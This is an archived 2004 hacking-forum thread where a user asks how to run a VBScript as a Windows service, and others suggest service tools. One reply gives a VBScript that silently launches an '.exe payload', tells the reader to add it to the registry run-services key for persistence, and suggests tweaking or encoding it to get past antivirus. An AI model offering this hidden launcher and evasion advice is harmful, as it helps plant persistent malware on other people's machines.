hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

onlinepass
Hi all,

Can any one of you can tell, how do we start the programs as Windows Services so that they run even after the system is "Logged off".

i have tried with xxxx.vbs file, but it gives an error stating
"Couldnot start yyyy service on Local System"

is there any other way that i could start my VBScript file as a service.

Thx
onlinepass
dmg
What tools did you use?

srvany.exe/instsrv.exe
firedaemon.exe
Xyntservice.exe
?
temptation
Well, I think the Service manager v1.3 is the best ...

I tried it several times ... always success ...
It does'nt only add a service, it also deletes and lists services ..

so long
Yorn
CODE
Dim WshShell
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "c:\nameoffile.exe", 0, false


Then put this vbs into the Registry run services

if AV picks it up try modifying line 2 or use the attached file which is essentially the above .vbs script, just encoded. All you'll need to do is modify the registry to tell it to find and load this .vbe and then rename your .exe payload to "nameoffile.exe" and put it in the same directory as this vbe.

Or you can do the work yourself, you lazy bastard script kiddie. smile.gif

(note: the attached file might pick up as being a virus. I am not going to try to make this hidden from AV, but my guess is that it probably is not detectable currently)
beenal
QUOTE (onlinepass @ Jan 7 2004, 11:12 AM)
Can any one of you can tell, how do we start the programs as Windows Services so that they run even after the system is "Logged off".

Every Service still runs if you log off!!!
Thats the advantage of services!!!
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.